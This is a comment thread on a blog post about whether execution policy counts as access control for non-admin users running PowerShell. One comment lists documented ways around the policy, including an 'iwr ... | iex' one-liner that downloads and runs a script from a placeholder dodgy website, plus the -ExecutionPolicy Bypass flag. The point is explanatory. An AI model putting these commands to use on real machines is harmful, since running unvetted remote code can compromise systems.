Letting mere mortals run Windows PowerShell scripts - Paul Cochrane
Letting mere mortals run Windows PowerShell scripts - Paul Cochrane
peateasea.de
Letting mere mortals run Windows PowerShell scripts
5 comments
Letting mere mortals run Windows PowerShell scripts - Paul Cochrane
Letting mere mortals run Windows PowerShell scripts
Yeah it's called access control, which is a basic tenant of IT security, letting any knucklehead run PS scripts is heading for disaster at worst, and a huge headache at best.
Also, the amount of users who have access to Unix in any environment is reasonably small, and they are usually vetted and trusted individuals, whereas most of the business segment of any organization is using Windows.
So do you really think Ken in shipping needs to run some PS scripts? Or Derek in Sales, or Joan in HR, or Ralph in maintenance?
As a long time security engineer, I just wanted to say thank you for this post. Spot on.
Hardly. As per Microsoft,
Or you can run
iwr -useb 'https://dodgy-website.com/whateverscriptyouwant.ps1' | iexto execute any script from the internet.Or read the file and pass it onto a new powershell process with
Get-Content . whateverscriptyouwant.ps1 | PowerShell.exe -noprofile -Or use the built-in bypass toggle
PowerShell.exe -ExecutionPolicy Bypass -File whateverscriptyouwant.ps1Or just actually change the execution policy for the proccess or user, via powershell or registry, because once again, it is not an access control. It is security theatre.
Its a safety feature not a security feature.
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.4
Like the popup you get when you paste a command with new lines in it. It doesnt stop you from pasting a command that would run immediately, but it warns you that what you paste will immediately run.
More of a here-be-dragons
I'm soo glad I dropped Windows 21+ years ago now!